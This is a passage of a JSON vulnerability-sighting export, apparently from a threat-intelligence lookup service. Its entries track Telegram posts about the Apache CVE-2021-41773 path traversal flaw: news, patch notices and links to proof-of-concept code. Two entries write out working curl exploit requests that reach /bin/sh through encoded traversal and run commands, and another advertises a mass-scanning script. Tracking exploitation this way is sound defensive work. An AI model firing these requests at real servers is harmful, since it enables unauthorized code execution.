\u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430: CVE-2022-25075-25084 \u0432 TOTOLINK, CVE-2021-44228/2021-45046 (Log4Shell), CVE-2021-41773/CVE-2021-42013 \u0432 HTTP-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 Apache, CVE-2018-20062 \u0432 ThinkPHP CMS, CVE-2017-18368 \u0432 Zyxel P660HN, CVE-2016-6277 \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 NETGEAR, CVE-2015-2051 \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 D-Link \u0438\nCVE-2014-9118 \u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445 Zhone.\n@NeKaspersky", "creation_timestamp": "2022-04-14T15:17:01.000000Z"}, {"uuid": "f3f7ed7e-91d6-4e2e-a023-4257f526d4f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/cibsecurity/29998", "content": "\u274c Apache Web Server Zero-Day Exposes Sensitive Data \u274c\n\nThe open-source project has rolled out a security fix for CVE-2021-41773, for which public cyberattack exploit code is circulating.\n\n\ud83d\udcd6 Read\n\nvia \"Threat Post\".", "creation_timestamp": "2021-10-05T22:27:44.000000Z"}, {"uuid": "379b941d-4a2f-4d42-9a0f-5a9375ccd2ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/900", "content": "blasty/CVE-2021-41773\nCVE-2021-41773 playground\nLanguage: Dockerfile\nStars: 153 Issues: 1 Forks: 37\nhttps://github.com/blasty/CVE-2021-41773", "creation_timestamp": "2021-10-10T18:03:51.000000Z"}, {"uuid": "0ebf36a2-f42c-4281-907c-ba905eb37631", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/pwnwiki_zhchannel/860", "content": "RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):\nroot@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'\nuid=1(daemon) gid=1(daemon) groups=1(daemon)", "creation_timestamp": "2021-10-08T05:00:59.000000Z"}, {"uuid": "e341eee9-02b7-490d-ae06-c16b9ea8699b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/thehackernews/1563", "content": "Apache has issued urgent security patches to address 2 new security vulnerabilities\u2014including a zero-day path traversal and file disclosure flaw (CVE-2021-41773) in HTTP servers that it said is being actively exploited in the wild.\n\nDetails: https://thehackernews.com/2021/10/apache-warns-of-zero-day-exploit-in.html", "creation_timestamp": "2021-10-05T17:09:54.000000Z"}, {"uuid": "17a7f566-2614-4219-9ef6-687db6abe408", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/xakep_ru/11408", "content": "\u0421\u0432\u0435\u0436\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Apache \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430\n\n\u0420\u0430\u043d\u0435\u0435 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache Software Foundation \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2021-41773 \u0432 \u0441\u0432\u043e\u0435\u043c HTTP \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0435. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u043f\u043e\u0434 \u0430\u0442\u0430\u043a\u0430\u043c\u0438, \u0430 \u043f\u043e\u044f\u0432\u0438\u0432\u0448\u0438\u0435\u0441\u044f \u0432 \u0441\u0435\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b \u0434\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442, \u0447\u0442\u043e \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430.\n\nhttps://xakep.ru/2021/10/07/apache-rce/", "creation_timestamp": "2021-10-07T17:03:47.000000Z"}, {"uuid": "049916d1-427c-4843-bac9-c62a778839bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/thehackernews/1572", "content": "A new urgent Apache patch update has been released for the actively exploited Path Traversal issue (CVE-2021-41773), which has now been identified as a critical remote code execution #vulnerability.\n\nDetails: https://thehackernews.com/2021/10/new-patch-released-for-actively.html", "creation_timestamp": "2021-10-08T06:54:29.000000Z"}, {"uuid": "399ed352-7966-4b5e-92f6-86b70407ecae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/xakep_ru/11422", "content": "\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache \u043f\u043e\u0434\u0433\u043e\u0442\u043e\u0432\u0438\u043b\u0438 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f \u0441\u0432\u0435\u0436\u0435\u0439 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 Apache \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u0442\u044c 0-day \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-41773 \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u0440\u0430\u0437\u0430. \u0422\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0431\u044b\u043b \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d \u0432\u0442\u043e\u0440\u043e\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440 CVE \u0438 \u0434\u043b\u044f \u043d\u0435\u0435 \u0432\u044b\u0448\u0435\u043b \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447.\n\nhttps://xakep.ru/2021/10/11/cve-2021-42013/", "creation_timestamp": "2021-10-11T18:33:48.000000Z"}, {"uuid": "3d013a25-9b83-4b18-844a-367fccf69e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/cultofwire/997", "content": "\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e CVE \u0447\u0435\u0440\u0435\u0437 API.\n\n\u0410\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u043a\u0430\u043d\u0435\u0440\u044b \u044d\u0442\u043e \u0445\u043e\u0440\u043e\u0448\u043e, \u043d\u043e false positive \u043d\u0438\u043a\u0442\u043e \u043d\u0435 \u043e\u0442\u043c\u0435\u043d\u044f\u043b. \u041f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u044d\u0442\u043e \u0432\u0441\u0451 \u043d\u0430\u0434\u043e, \u043d\u043e \u0440\u0443\u043a\u0430\u043c\u0438 \u0433\u0443\u0433\u043b\u0438\u0442\u044c \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u0434\u043e\u043b\u0433\u0438\u0439. \u0411\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 API.\n\n\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u043d\u0444\u0443 \u043f\u043e CVE \u0441\u043e \u0432\u0441\u0435\u043c\u0438 \u0434\u0435\u0442\u0430\u043b\u044f\u043c\u0438:\ncurl -s https://cve.circl.lu/api/cve/CVE-2021-41773 \n\n\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043f\u043e CVE, \u0432\u044b\u0432\u043e\u0434\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u0435\u0440\u0441\u0438\u0438 \u041f\u041e:\ncurl -s https://cve.circl.lu/api/cve/CVE-2021-41773 | jq \".id, .vulnerable_product\"\n\n\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043f\u043e CVE \u0438\u0437 \u0441\u043f\u0438\u0441\u043a\u0430:\ncat cve.list | xargs -I % curl -s https://cve.circl.lu/api/cve/% | jq \".id, .vulnerable_product\"\n \n\u041a\u0440\u043e\u043c\u0435 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e\u0433\u043e API \u043c\u043e\u0436\u043d\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u0441\u0432\u043e\u0439 CVE-Search c  \u043f\u0440\u0435\u0444\u0435\u0440\u0430\u043d\u0441\u043e\u043c \u0438 \u043a\u0443\u0440\u0442\u0438\u0437\u0430\u043d\u043a\u0430\u043c\u0438  Mongo \u0438 Flask.\n\u0418 \u0434\u0430\u0436\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 \u0434\u043b\u044f Python \u0435\u0441\u0442\u044c.\n\nP.S. \u041d\u0435 \u0443\u0434\u0430\u0451\u0442\u0441\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0441\u043f\u0438\u0441\u043e\u043a CVE \u043f\u043e \u0432\u0435\u043d\u0434\u043e\u0440\u0443, \u0442\u043e\u043b\u0438 \u043b\u044b\u0436\u0438 \u043d\u0435 \u0435\u0434\u0443\u0442, \u0442\u043e\u043b\u0438 \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u043d\u0430\u0434\u043e \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.\n\n\u0414\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f \u043a API \n\u041b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 CVE-Search \n\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 python", "creation_timestamp": "2022-04-27T20:24:01.000000Z"}, {"uuid": "d3955521-3bc8-4a70-a80b-83e19dee15c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/webpwn/305", "content": "\u041d\u0435\u0434\u0430\u0432\u043d\u044f\u044f CVE-2021-41773 \u0432 Apache 2.4.49, \u044d\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b\u0445\u043e\u0434 \u0438\u0437 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441 \u0447\u0442\u0435\u043d\u0438\u0435\u043c \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u0430\u043a \u043c\u043d\u043e\u0433\u0438\u0435 \u043f\u043e\u0434\u0443\u043c\u0430\u043b\u0438 \n\ncurl --data \"A=|echo;id\" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'", "creation_timestamp": "2021-10-06T11:18:40.000000Z"}, {"uuid": "b85ffb7b-952d-46ee-9691-fa7651e57881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1227", "content": "CVE-2021\nCVE-2021-41773 Test Page &amp; Exploit Code\n\nhttps://github.com/jhye0n/CVE-2021-41773\n\n@BlueRedTeam", "creation_timestamp": "2021-11-26T07:34:27.000000Z"}, {"uuid": "3682ed11-da34-4e05-8d64-026a356263ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/arvin_club/4888", "content": "https://github.com/Balgogan/CVE-2021-41773", "creation_timestamp": "2021-11-11T18:58:08.000000Z"}, {"uuid": "b94a5163-0eb3-47d4-b4dc-e6e7d0cce0b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/5698", "content": "CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited\n\nhttps://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited", "creation_timestamp": "2021-10-05T23:41:42.000000Z"}, {"uuid": "8db1abec-46ba-436d-9f75-546011cc0007", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/forensictools/469", "content": "RedTeam Toolkit\n[https://github.com/signorrayan/RedTeam_toolkit]\n\nweb-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 Python (Django), \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0435\u0435 \u043d\u0430\u0431\u043e\u0440 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 red-team \u0434\u043b\u044f \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439. \u0412 \u043e\u0441\u043d\u043e\u0432\u0435 \u043b\u0435\u0436\u0430\u0442 \u0442\u0430\u043a\u0438\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u044b, \u043a\u0430\u043a nmap, rustscan, dirsearch, shreder, circl, crowbar \u0438 \u0442.\u0434.\n\n\u2022 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u043e\u0440\u0442\u043e\u0432 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0446\u0435\u043b\u0438\n\u2022 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0441\u0435\u0445 \u0436\u0438\u0432\u044b\u0445 \u0445\u043e\u0441\u0442\u043e\u0432 \u0432 \u043f\u043e\u0434\u0441\u0435\u0442\u0438\n\u2022 \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0432\u0441\u0435\u0445 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432 \u0446\u0435\u043b\u0438\n\u2022 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 CVE \u043f\u043e CveID\n\u2022 \u0430\u0442\u0430\u043a\u0430 \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u044e SSH\n\u2022 RDP BruteForce\n\u2022 \u0440\u0430\u0437\u0434\u0435\u043b WebApps: Apache Path Traversal PoC (CVE-2021-41773), \u0412\u0435\u0431-\u043a\u0440\u0430\u0443\u043b\u0435\u0440 \u0434\u043b\u044f \u0441\u0431\u043e\u0440\u0430 URL-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u041f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435 \u0441\u0443\u0431\u0434\u043e\u043c\u0435\u043d\u043e\u0432\n\u2022 \u0440\u0430\u0437\u0434\u0435\u043b Windows (\u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0435\u0442\u0441\u044f, \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 CVE \u0431\u0443\u0434\u0443\u0442 \u0434\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u044b): Microsoft Exchange ProxyShell PoC (CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)\n\u2022 \u0440\u0430\u0437\u0434\u0435\u043b Linux \u0434\u043b\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 CVE \u0432 Linux \u0442\u0430\u043a\u0436\u0435 \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f\n\n#pentest #python #redteam #vulns", "creation_timestamp": "2021-11-29T11:51:06.000000Z"}, {"uuid": "ebfe29b2-68a7-432b-9794-c6c2a92cc3d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "Telegram/9V4O5GyR-stJQC0BWlKyuz-Z5W_SuVUFieTI2mu8GO0G59d6", "content": "", "creation_timestamp": "2021-10-16T21:13:17.000000Z"}, {"uuid": "b7458988-38ec-48c4-a6c5-6a418c152547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/wwcYJfnnFRfwXhRTNZswnyr2qX5jmE63v09EPyapGsLqAlda", "content": "", "creation_timestamp": "2021-10-17T11:42:49.000000Z"}, {"uuid": "d51fcdfc-1581-492d-9423-659a773e9d9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/secinfosex/41", "content": "CVE-2021-41773: Apache 2.4.49 Path Traversal\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0439\u0442\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0432\u0435\u0431\u0441\u0430\u0439\u0442\u0430 \u0438 \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441\u0447\u0438\u0442\u0430\u0442\u044c, \u043d\u0443 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, /etc/passwd\n\n\u041a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u0432\u0435\u043b \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u0440\u0435\u0444\u0430\u043a\u0442\u043e\u0440\u0438\u043d\u0433 - \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2.4.49 \u0440\u0435\u0448\u0438\u043b\u0438 \u0443\u043d\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0441\u0442\u044b\u043d\u044e \u0441 \u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u043f\u0443\u0442\u0438, \u0438 \u0432\u044b\u043d\u0435\u0441\u043b\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e ap_normalize_path. \n\n\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 '.' \u0432 \u043f\u0443\u0442\u0438 \u0438 \u0437\u0430\u043a\u0440\u0430\u043b\u0441\u044f \u0431\u0430\u0433 \u0432 571 \u0441\u0442\u0440\u043e\u043a\u0435 - \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0441\u0442 \u043d\u0435 \u0443\u0447\u0435\u043b, \u0447\u0442\u043e \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0435\u0449\u0435 \u043d\u0435 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u0435\u043b url decode. \n\n\u0412 \u0438\u0442\u043e\u0433\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f, \u043a\u043e\u0433\u0434\u0430 \u0432\u0441\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043d\u0430 \u043e\u0431\u0445\u043e\u0434 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 \u0447\u0435\u0440\u0435\u0437 %2e%2e \u043f\u043e\u043f\u0430\u043b\u0438 \u0432 \u0443\u0441\u043b\u043e\u0432\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043d\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043b\u043e\u0441\u044c, \u0438 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0443\u0442\u0438 ap_normalize_path, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438 \u0434\u043e\u043b\u0436\u043d\u0430 \u0441\u0440\u0435\u0437\u0430\u0442\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u0432\u0440\u043e\u0434\u0435 ../, \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0442\u044c \u043d\u0435\u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0443\u0442\u044c.", "creation_timestamp": "2021-10-05T18:58:14.000000Z"}, {"uuid": "1f3fcf1f-d54d-4c57-8c60-b0cabed843cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/hackingtoolsprvi8/2161", "content": "\ud83c\udf0e Mass Cve 2021-41773 \ud83d\udc93\n\nThis exploit Apache HTTP Server 2.4.49 (2021)\n\npath traversal and file disclosure vulnerability in Apache HTTP Server\n\nPython Version : Python3\n\nUsage :\npython3 -m pip install requests\npyyhon3 cve-2021-41773.py sitelist.txt 50\n\nresults will be automatically saved in vuln.txt\n\nLink Download : HERE", "creation_timestamp": "2022-05-14T22:40:54.000000Z"}, {"uuid": "175523fc-cde7-4daf-ad35-ab84e3a5487d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/arvin_club/4735", "content": "\u062f\u0631 \u0627\u0633\u0631\u0639 \u0648\u0642\u062a \u0648\u0628 \u0633\u0631\u0648\u0631 \u0622\u067e\u0627\u0686\u06cc \u0631\u0648 \u0628\u0631\u0648\u0632 \u06a9\u0646\u06cc\u062f\nhttps://httpd.apache.org/security/vulnerabilities_24.html\n\nhttps://github.com/creadpag/CVE-2021-41773-POC//", "creation_timestamp": "2021-10-08T14:54:33.000000Z"}, {"uuid": "d3f02bf4-edf3-489c-8cda-d094e1804ff0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/gpOUF48JYpPbayv82hDEIKK44R-nqK7VlljkxTI4D0eq459K", "content": "", "creation_timestamp": "2021-10-06T15:42:18.000000Z"}, {"uuid": "914c46ed-3e21-4b88-8a45-b11035a27ab2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4454", "content": "#exploit\n1. CVE-2021-39239:\nA vulnerability in XML processing in Apache Jena &lt;4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server\nhttps://github.com/AKIA27TACKEDYE76PUGU/CVE-2021-39239\n\n2. CVE-2021-24620:\nRCE in WordPress Simple Ecomm. Shopping Cart &lt;2.2.5\nhttps://github.com/AKIA27TACKEDYE76PUGU/CVE-2021-24620\n\n3. CVE-2021-41773:\nApache 2.4.49 Path Traversal\nhttps://github.com/numanturle/CVE-2021-41773\nhttps://github.com/habibiefaried/CVE-2021-41773-PoC", "creation_timestamp": "2024-05-14T02:35:13.000000Z"}, {"uuid": "dce97f88-602a-4d40-bda9-032dae6f60df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/4637", "content": "#Threat_Research\n1. Apache HTTP Server CVE-2021-42013, CVE-2021-41773 Exploited in the Wild\nhttps://blogs.juniper.net/en-us/threat-research/apache-http-server-cve-2021-42013-and-cve-2021-41773-exploited\n2. CVE-2021-39341:\nA vulnerability in the the OptinMonster plugin\nhttps://www.wordfence.com/blog/2021/10/1000000-sites-affected-by-optinmonster-vulnerabilities", "creation_timestamp": "2021-10-31T16:24:28.000000Z"}, {"uuid": "b1aed2b9-f513-4b91-9582-fbcb26f8f519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/4701", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Oct 1-31)\nCVE-2021-41773 - Apache 2.4.49 Path Traversal\nhttps://t.me/cybersecuritytechnologies/4454\nCVE-2021-26084 - Confluence Server Webwork 